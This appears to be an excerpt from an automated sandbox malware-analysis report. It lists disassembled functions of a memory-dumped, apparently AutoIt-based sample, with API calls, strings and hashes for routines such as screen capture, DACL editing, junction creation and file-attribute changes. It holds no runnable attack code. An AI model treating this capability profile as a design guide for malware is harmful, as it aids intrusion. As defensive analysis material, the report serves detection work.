.exe, xrefs: 00DFE351
.dll, xrefs: 00DFE374

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
String ID: .dll$.exe$.icl
API String ID: 3907162815-1154884017
Opcode ID: 7d313ea13d89be527c9a47ee5ce91ab99897f228846e535f25b59121be4f6467
Instruction ID: ba50b21e3971164cbb42b0eb3a78f19e7b6d917d8216edbb5d935bbd660ed4a0
Opcode Fuzzy Hash: 7d313ea13d89be527c9a47ee5ce91ab99897f228846e535f25b59121be4f6467
Instruction Fuzzy Hash: 5F618C71500219BEEB14DF64CC46BFA7BA8FB08721F108219FA15E61E1DB74D984D7B0

Function 00DE0E41 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 184timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32(?), ref: 00DE0EFF
SystemTimeToFileTime.KERNEL32(?,?), ref: 00DE0F0F
LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00DE0F1B
__wsplitpath.LIBCMT ref: 00DE0F79
_wcscat.LIBCMT ref: 00DE0F91
_wcscat.LIBCMT ref: 00DE0FA3
GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00DE0FB8
SetCurrentDirectoryW.KERNEL32(?), ref: 00DE0FCC
SetCurrentDirectoryW.KERNEL32(?), ref: 00DE0FFE
SetCurrentDirectoryW.KERNEL32(?), ref: 00DE101F
_wcscpy.LIBCMT ref: 00DE102B
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00DE106A

Strings

*.*, xrefs: 00DE1025

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
String ID: *.*
API String ID: 3566783562-438819550
Opcode ID: e68c55de0c81b5a2182bd02db79344b9aaac27f70300e1299711458186b326a9
Instruction ID: 3ff57d040e49d0aab25a4e8df4b36667f73cd21999f63e7b4c2510de59f2ff9e
Opcode Fuzzy Hash: e68c55de0c81b5a2182bd02db79344b9aaac27f70300e1299711458186b326a9
Instruction Fuzzy Hash: A1619FB65083459FCB10EF25C84099EB7E8FF89310F04891EF99997251EB31EA45CBB2

Function 00DDDAAD Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00D984A6: __swprintf.LIBCMT ref: 00D984E5
Part of subcall function 00D984A6: __itow.LIBCMT ref: 00D98519

CharLowerBuffW.USER32(?,?), ref: 00DDDB26
GetDriveTypeW.KERNEL32 ref: 00DDDB73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DDDBBB
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DDDBF2
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00DDDC20

Part of subcall function 00D97E53: _memmove.LIBCMT ref: 00D97EB9

Strings

closed, xrefs: 00DDDB3A, 00DDDB43
close cd wait, xrefs: 00DDDC0B
open, xrefs: 00DDDB4D
open , xrefs: 00DDDB82
close, xrefs: 00DDDB2C
set cd door , xrefs: 00DDDBC1
wait, xrefs: 00DDDBDD
type cdaudio alias cd wait, xrefs: 00DDDB9E

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
API String ID: 2698844021-4113822522
Opcode ID: fa422fbf639eb6f88dba56829c36bfd388615e05d93e8122c8b5311f3c43c1e9
Instruction ID: f0b905b774a0f37b64bb70adae4ca76d461c35438ac181fdeecae1fa0651bd0c
Opcode Fuzzy Hash: fa422fbf639eb6f88dba56829c36bfd388615e05d93e8122c8b5311f3c43c1e9
Instruction Fuzzy Hash: 06518E711083059FCB00EF24D88196AB7F9FF88758F14896DF895A7261DB31EE05CB61

Function 00DD3110 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 129windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00E04085,00000016,0000138B,?,00000000,?,?,00000000,?), ref: 00DD3145
LoadStringW.USER32(00000000,?,00E04085,00000016), ref: 00DD314E

Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F

GetModuleHandleW.KERNEL32(00000000,00000000,?,00000FFF,?,?,00E04085,00000016,0000138B,?,00000000,?,?,00000000,?,00000040), ref: 00DD3170
LoadStringW.USER32(00000000,?,00E04085,00000016), ref: 00DD3173
__swprintf.LIBCMT ref: 00DD31B3
__swprintf.LIBCMT ref: 00DD31C5
_wprintf.LIBCMT ref: 00DD326C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DD3283

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00DD3267
Error: , xrefs: 00DD323C
Line %d:, xrefs: 00DD31AD
^ ERROR, xrefs: 00DD3216
Line %d (File "%s"):, xrefs: 00DD31BF

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 947a017e633bed1c5be5420ad29e7c744d36f2e1db84efba2fe37a0003503533
Instruction ID: 5bd13102d99bbc263b6a42bb48f48e045f100b276e76bc90119ae54811b8069a
Opcode Fuzzy Hash: 947a017e633bed1c5be5420ad29e7c744d36f2e1db84efba2fe37a0003503533
Instruction Fuzzy Hash: D4413D72904209BACF15FBA1DD96EEEB778EF14741F100066F201B21A2EA656F08CB71

Function 00DDD950 Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 100fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00DDD96C
__swprintf.LIBCMT ref: 00DDD98E
CreateDirectoryW.KERNEL32(?,00000000), ref: 00DDD9CB
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00DDD9F0
_memset.LIBCMT ref: 00DDDA0F
_wcsncpy.LIBCMT ref: 00DDDA4B
DeviceIoControl.KERNEL32(00000000,000900A4,A0000003,?,00000000,00000000,?,00000000), ref: 00DDDA80
CloseHandle.KERNEL32(00000000), ref: 00DDDA8B
RemoveDirectoryW.KERNEL32(?), ref: 00DDDA94
CloseHandle.KERNEL32(00000000), ref: 00DDDA9E

Strings

\, xrefs: 00DDD9A4
:, xrefs: 00DDD9AF
\??\%s, xrefs: 00DDD988

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
String ID: :$\$\??\%s
API String ID: 2733774712-3457252023
Opcode ID: c4e742e2987fbd71daf64ba9d5bd4cc50686afa252719f0b941dfe06c49ee91e
Instruction ID: d98dc05899185a9de1cfff24afca774742094a52f8f976bf21da9ac5020cb4b6
Opcode Fuzzy Hash: c4e742e2987fbd71daf64ba9d5bd4cc50686afa252719f0b941dfe06c49ee91e
Instruction Fuzzy Hash: C2319276A00208AEDF20DFA5DC49FDA77BDEF88700F14C1A6F559E2160E7709A458BB1

Function 00DFE541 Relevance: 22.6, APIs: 15, Instructions: 129filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00DFBD04,?,?), ref: 00DFE564
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00DFBD04,?,?,00000000,?), ref: 00DFE57B
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00DFBD04,?,?,00000000,?), ref: 00DFE586
CloseHandle.KERNEL32(00000000,?,?,?,?,00DFBD04,?,?,00000000,?), ref: 00DFE593
GlobalLock.KERNEL32(00000000), ref: 00DFE59C
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00DFBD04,?,?,00000000,?), ref: 00DFE5AB
GlobalUnlock.KERNEL32(00000000), ref: 00DFE5B4
CloseHandle.KERNEL32(00000000,?,?,?,?,00DFBD04,?,?,00000000,?), ref: 00DFE5BB
CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00DFE5CC
OleLoadPicture.OLEAUT32(?,00000000,00000000,00E1D9BC,?), ref: 00DFE5E5
GlobalFree.KERNEL32(00000000), ref: 00DFE5F5
GetObjectW.GDI32(00000000,00000018,?), ref: 00DFE619
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00DFE644
DeleteObject.GDI32(00000000), ref: 00DFE66C
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00DFE682

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 4fc53f9a6e4e0342534f14600ddca645df572d27a06b3ada601d371e337e2031
Instruction ID: 8cb5ff4a477fe4f28699860663e9982d632ea56514984efa3431390b9a021de4
Opcode Fuzzy Hash: 4fc53f9a6e4e0342534f14600ddca645df572d27a06b3ada601d371e337e2031
Instruction Fuzzy Hash: 20416875604218BFDB119F66DC88EAEBBB9EF89715F10C058FA16E7260D730AD44CB20

Function 00DE0B20 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00DE0C93
_wcscat.LIBCMT ref: 00DE0CAB
_wcscat.LIBCMT ref: 00DE0CBD
GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 00DE0CD2
SetCurrentDirectoryW.KERNEL32(?), ref: 00DE0CE6
GetFileAttributesW.KERNEL32(?), ref: 00DE0CFE
SetFileAttributesW.KERNEL32(?,00000000), ref: 00DE0D18
SetCurrentDirectoryW.KERNEL32(?), ref: 00DE0D2A

Strings

*.*, xrefs: 00DE0D69

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 5e86f0ec40935f3dd07214e080e8bfd5df5c9d8868bd3e16016a0476bab84f2a
Instruction ID: f779b0683f3ae107b22598da921750230f1e29542da83faf7551946dcdfc3748
Opcode Fuzzy Hash: 5e86f0ec40935f3dd07214e080e8bfd5df5c9d8868bd3e16016a0476bab84f2a
Instruction Fuzzy Hash: D38194715043859FCB24EF65C8449AABBE8FB88314F28892AF885D7251E774DDC4CB72

Function 00DCB593 Relevance: 21.2, APIs: 14, Instructions: 178memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00DCB8E7: GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00DCB903
Part of subcall function 00DCB8E7: GetLastError.KERNEL32(?,00DCB3CB,?,?,?), ref: 00DCB90D
Part of subcall function 00DCB8E7: GetProcessHeap.KERNEL32(00000008,?,?,00DCB3CB,?,?,?), ref: 00DCB91C
Part of subcall function 00DCB8E7: RtlAllocateHeap.NTDLL(00000000,?,00DCB3CB), ref: 00DCB923
Part of subcall function 00DCB8E7: GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00DCB93A

Part of subcall function 00DCB982: GetProcessHeap.KERNEL32(00000008,00DCB3E1,00000000,00000000,?,00DCB3E1,?), ref: 00DCB98E
Part of subcall function 00DCB982: RtlAllocateHeap.NTDLL(00000000,?,00DCB3E1), ref: 00DCB995
Part of subcall function 00DCB982: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00DCB3E1,?), ref: 00DCB9A6

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00DCB5F7
_memset.LIBCMT ref: 00DCB60C
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00DCB62B
GetLengthSid.ADVAPI32(?), ref: 00DCB63C
GetAce.ADVAPI32(?,00000000,?), ref: 00DCB679
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00DCB695
GetLengthSid.ADVAPI32(?), ref: 00DCB6B2
GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00DCB6C1
RtlAllocateHeap.NTDLL(00000000), ref: 00DCB6C8
GetLengthSid.ADVAPI32(?,00000008,?), ref: 00DCB6E9
CopySid.ADVAPI32(00000000), ref: 00DCB6F0
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00DCB721
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00DCB747
SetUserObjectSecurity.USER32(?,00000004,?), ref: 00DCB75B

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
String ID:
API String ID: 2347767575-0
Opcode ID: c446929d588ff8e1700cf4f210441c50715460945d8b64a9b5c96fcb9d198c40
Instruction ID: 4496cd0617d9196c8c4e5a9a68e8b10d36de322979b883c88d8010d61ae3419c
Opcode Fuzzy Hash: c446929d588ff8e1700cf4f210441c50715460945d8b64a9b5c96fcb9d198c40
Instruction Fuzzy Hash: A6514D7590020AAFDF009FA5DC46EEEBB79FF44364F04815EE915A7290DB35DA05CB60

Function 00DEA268 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 159windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00DEA2DD
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00DEA2E9
CreateCompatibleDC.GDI32(?), ref: 00DEA2F5
SelectObject.GDI32(00000000,?), ref: 00DEA302
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00DEA356
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,?,00000000), ref: 00DEA392
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00DEA3B6
SelectObject.GDI32(00000006,?), ref: 00DEA3BE
DeleteObject.GDI32(?), ref: 00DEA3C7
DeleteDC.GDI32(00000006), ref: 00DEA3CE
ReleaseDC.USER32(00000000,?), ref: 00DEA3D9

Strings

(, xrefs: 00DEA37E

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 4ae4de0fe5c64689159ff8ae79bc916d1e978af4ba512b8b2f8d12a4a18302e2
Instruction ID: b5221a8a1e39e6547e1bb0579a80fd60e02ad24e255e4035b9abccfa6b4df542
Opcode Fuzzy Hash: 4ae4de0fe5c64689159ff8ae79bc916d1e978af4ba512b8b2f8d12a4a18302e2
Instruction Fuzzy Hash: D9515875A04349EFCB15DFA9CC84EAEBBB9EF48310F14841DF99AA7210C731A845CB60

Function 00DF3AF7 Relevance: 21.1, APIs: 1, Strings: 11, Instructions: 109COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DF2AA6,?,?), ref: 00DF3B0E

Strings

HKCC, xrefs: 00DF3BC2
HKEY_CURRENT_USER, xrefs: 00DF3BD3
HKCU, xrefs: 00DF3BE4
HKCR, xrefs: 00DF3B9C
HKEY_CLASSES_ROOT, xrefs: 00DF3B87
HKLM, xrefs: 00DF3B72
HKU, xrefs: 00DF3C06
HKEY_CURRENT_CONFIG, xrefs: 00DF3BB1
HKEY_LOCAL_MACHINE, xrefs: 00DF3B5D
HKEY_USERS, xrefs: 00DF3BF5
|E, xrefs: 00DF3B27

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU$|E
API String ID: 3964851224-875377453
Opcode ID: 67c5b69318e20228c06c6f18f7ee42b4702958fd4dffff13c44e19e617393683
Instruction ID: da399d32f214aea309d162af122cebd072be103cde13683772d8aed1f3a32b06
Opcode Fuzzy Hash: 67c5b69318e20228c06c6f18f7ee42b4702958fd4dffff13c44e19e617393683
Instruction Fuzzy Hash: D6417EB420034A8BCF04EF54E841BFA3361EF56390F1B8864ED916B295DB34DA59CB70

Function 00DD32B0 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 72windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00E03C64,00000010,00000000,Bad directive syntax error,00E2DBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 00DD32D1
LoadStringW.USER32(00000000,?,00E03C64,00000010), ref: 00DD32D8

Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F

_wprintf.LIBCMT ref: 00DD3309
__swprintf.LIBCMT ref: 00DD332B
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00DD3395

Strings

., xrefs: 00DD337B
Error: , xrefs: 00DD3363
Line %d:, xrefs: 00DD3325
%s (%d) : ==> %s.: %s %s, xrefs: 00DD3304
Line %d (File "%s"):, xrefs: 00DD333B
", xrefs: 00DD3338, 00DD3322, 00DD32FE

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:$"
API String ID: 1506413516-3476811254
Opcode ID: 2c30e71f848d550904dcccf0ab461260c910735dab9b67822b7c1ac84281cfdf
Instruction ID: 445983abd4076e50066f98cd730b8fa125fa714cff89942014e5804b20f53abd
Opcode Fuzzy Hash: 2c30e71f848d550904dcccf0ab461260c910735dab9b67822b7c1ac84281cfdf
Instruction Fuzzy Hash: 2C21283284421AFBCF12AF90DC0AEEE7779FF14700F004456B516B10A2EA75AA58DB71

Function 00DDD520 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 144COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF), ref: 00DDD567

Part of subcall function 00D9CAEE: _memmove.LIBCMT ref: 00D9CB2F

LoadStringW.USER32(?,?,00000FFF,?), ref: 00DDD589
__swprintf.LIBCMT ref: 00DDD5DC
_wprintf.LIBCMT ref: 00DDD68D
_wprintf.LIBCMT ref: 00DDD6AB

Strings

Error: , xrefs: 00DDD657
"%s" (%d) : ==> %s:, xrefs: 00DDD6A6
"%s" (%d) : ==> %s:%s%s, xrefs: 00DDD688
^ ERROR, xrefs: 00DDD631
Line %d (File "%s"):, xrefs: 00DDD5D6

Memory Dump Source

Source File: 00000002.00000002.2657710003.0000000000D91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00D90000, based on PE: true

Associated: 00000002.00000002.2657630213.0000000000D90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E3E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E4A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000E64000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2657710003.0000000000EED000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2658987924.0000000000EF3000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2659256194.0000000000EF4000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_d90000_UNK_.jbxd

Similarity

API ID: LoadString_wprintf$__swprintf_memmove
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 2116804098-2391861430
